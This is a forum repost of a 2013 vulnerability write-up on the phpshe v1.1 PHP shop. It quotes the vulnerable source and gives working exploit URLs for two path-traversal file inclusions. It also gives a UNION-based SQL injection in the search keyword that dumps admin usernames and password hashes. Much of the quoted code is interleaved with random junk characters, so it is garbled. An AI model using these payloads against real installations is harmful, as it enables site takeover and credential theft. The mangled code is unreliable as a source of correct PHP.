phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin · 发表于 2013-4-16 16:45:03

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件第15行开始
url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

, b/ V( f D3 Q$ ~" u
) f7 F1 _+ [2 {! r& R( g 0×02 搜索注入8 Y1 X: V/ I' q) l9 m2 v, [: H0 `, Q
: K$ t" N. N/ f& [5 t
<code id="code2">

//product.php文件
' K( |3 x& B5 p" ~2 L, ycase 'list':1 i( N1 K  B& L- y( T
$category_id = intval($id);1 |. Q* B( x/ K! d% y4 I: ?
$info = $db->pe_select('category', array('category_id'=>$category_id));
3 V8 G+ P- t" H; W//搜索: A) d2 Q9 ^- B* B% ^
$sqlwhere = " and `product_state` = 1";
' g( A$ N. t' Z: cpe_lead('hook/category.hook.php');) r0 N  H% {# v% k, T6 y: {1 s
if ($category_id) {
) f2 r4 e; E0 b9 A% L! I& Awhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";, \: g; @2 {2 M+ \4 G
}
/ o' u3 A2 t/ h, B% c% B8 [$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
' `( L: Y& N; cif ($_g_orderby) {
( z9 m  k, X* [- k$orderby = explode('_', $_g_orderby);: V' n  a/ V+ C4 a4 F9 c2 y% U6 M
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
/ ]$ W1 d) [* B/ felse {. N# D$ o- C; c( V( X5 y
$sqlwhere .= " order by `product_id` desc";4 f" i) b- q! P
}( ^/ m; R. I2 h! ^
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
  }3 C  y+ J8 H5 s7 }# [//热卖排行6 \5 R7 Z. v$ Z/ }5 Q+ r* d7 |
$product_hotlist = product_hotlist();4 n2 t5 b6 X* |* ~4 d' ?4 [0 c4 r
//当前路径# Y# l' f* ^; r, W/ {* C# H8 ]5 h
$nowpath = category_path($category_id);' _6 G, ?$ F" ^" |2 z
$seo = pe_seo($info['category_name']);$ J; b. t! E, y% q/ m
include(pe_tpl('product_list.html'));
  L$ b, I2 w* L3 u//跟进selectall函数库  r/ |% s" h# b  e
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())' q6 {+ ?! a% V* P% l4 D
{
) {4 R) [5 X& @7 h: i# D) F//处理条件语句
2 ], w9 @9 t/ s- z$sqlwhere = $this->_dowhere($where);
0 B; Q' V: x' v% \. w/ hreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);( x: L1 {  a+ _8 R
}, H) t1 l  }) [$ N' f
//exp5 f+ ~  t' @' E$ u: t) I1 E
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1$ ~6 g  `! }$ t$ D

</code> P) F! I) L% e* _! z4 \
9 @# b2 {5 |9 \2 W3 r
0×03 包含漏洞2
7 {: F9 a$ G2 U8 O4 h( m 2 n* a! Z1 R0 q4 k n4 j
<code id="code3">

//order.php

case 'pay':

) ?( X2 x% Q) L+ y; Q k0 Z
$order_id = pe_dbhold($_g_id);

2 P% \. ?# R) A8 W$cache_payway = cache::get('payway');

6 P+ r2 O* g; G. R6 D
foreach($cache_payway as $k => $v) {

$ O& _) J$ L0 K8 h* m' G& U: z
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

0 `! |2 X: Q9 @; rif ($k == 'bank') {

0 Q% Y$ m" { C9 s
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

: x1 J2 L3 |4 Z2 \}

1 t: B4 y% F- F* z. U$ Z
}

8 a5 L; s3 n8 V1 @
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

) x: s" v0 ]* c* B" l!$order['order_id'] && pe_error('订单号错误...');

& L) v% j; g% V2 e, I% z
if (isset($_p_pesubmit)) {

) A& q$ f% F, cif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

- ~: R+ ?' H; Q! g2 S H
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

1 ^; U' t1 G; K/ Y. [5 v" x
foreach ($info_list as $v) {

% l, n6 ^$ L7 U f/ I' C$ e& g$order['order_name'] .= "{$v['product_name']};";9 K; l% k# a" M3 C. V

7 X# ?, j9 q6 o h: [
}

7 r3 n3 k$ K3 \2 V( l2 T+ l' |
echo '正在为您连接支付网站，请稍后...';

J5 D5 N& i# P3 l# P. b6 c( iinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

( |% V8 [+ B/ I. L
}//当一切准备好的时候就可以进行"鸡肋包含了"

) ?& C; ], d7 v) J* V# L% D' Ielse {

- ^/ p' U( L2 X$ `" O. U) r6 rpe_error('支付错误...');

) W) a" I' I, S9 n) M$ L' H" e) Q1 p6 L}

( q, _" Q1 t4 i- F& R4 z, g
}

; X' q( p# u1 m/ w
$seo = pe_seo('选择支付方式');

. X g7 ?( B1 L3 binclude(pe_tpl('order_pay.html'));

5 \2 \4 c' f) @2 }% { }
break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
5 {. o& D( b+ O }8 \ \http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

		自动登录	找回密码
密码			立即注册